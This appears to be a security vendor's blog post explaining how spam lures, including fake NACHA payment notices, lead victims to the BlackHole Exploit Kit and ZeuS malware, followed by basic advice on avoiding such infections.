Lately, we have been seeing a renewed increase in the volume of spam attacks that utilize an exploit kit, specifically the BlackHole Exploit Kit to trigger a malicious payload. We have seen this in the latest slew of Automated Clearing House (ACH) spam attacks and the more recent spam run related to Steve Jobs’s death.
In this post, we will reorient readers on the infection chain of such an attack to help them understand why basic mitigation practices are still effective and can help them protect themselves from today’s threats.
In a typical spam campaign that involves malware, cybercriminals lure users through social engineering to perform several actions before the intended payload gets executed. For example, a user needs to download, extract, and execute a supposedly “benign” file for a spam attack to succeed.
Spam campaigns that use exploit kits, however, are a bit more dangerous since these only need to lure the users into clicking a malicious link for the rest of the infection to take place.
Below is an example of this type of spam supposedly from the National Automated Clearing House Association (NACHA). NACHA manages the ACH network, which facilitates bulk payment transactions involving businesses, governments, and consumers. Users who are more likely to receive email from NACHA conduct transactions related to payroll, government benefits, tax refunds, and others.
When decrypted, we can see that the script attempts to embed an iframe pointing to another malicious site, which uses the BlackHole Exploit Kit:
Once the iframe is loaded, content is also loaded from the BlackHole Exploit Kit site, which again contains a highly obfuscated script. Upon decoding the code, we can now see the actual code that searches for vulnerable software and uses the appropriate exploits.
The BlackHole Exploit Kit exploits vulnerabilities both in third-party applications like Adobe Acrobat and Flash Player and Java as well as in Windows components like Microsoft Data Access Components (MDAC) and Help and Support Center (HCP).
Successful exploitation executes a shellcode that triggers the download and execution of malware. We observed that these attacks have been used to spread ZeuS variants although these may also be used to spread other malware.
As a reminder to users, here are some ways to prevent this kind of threat from affecting their systems:
- Be aware of social engineering attacks. The majority of online attacks today utilize social engineering before the malware can exhibit technical infection payloads. By being wary of what you do online, infections can already be mitigated from the onset. Simple common sense like not entertaining unsolicited email can go a long way in keeping your personal information safe online.
- Always check for malicious links. Check what URLs point to. It is also a good practice to copy and paste a URL onto your browser’s address bar instead of directly clicking links.
- Always remember to patch. The BlackHole Exploit Kit utilizes exploits that affect old, unpatched versions of software. The persistence of such tools means that old exploits are still able to infect many users. No matter how inconvenient it may be, regularly patching your software is still an important mitigation step.
The state of the threat landscape and the overwhelming reliance of the general public on the Internet demand that users should stay aware of the kinds of threats found online as well as of ways to protect themselves by following advice. Knowing how attacks such as these work, users can gain advantage over attackers and be able to stop threats before these even reach their systems. A little self-education can ultimately make the Internet a better and safer place to be in.
More information on how cybercriminals utilize spam in malicious schemes can be found in our recently released security focus report, “Spam in Today’s Business World.”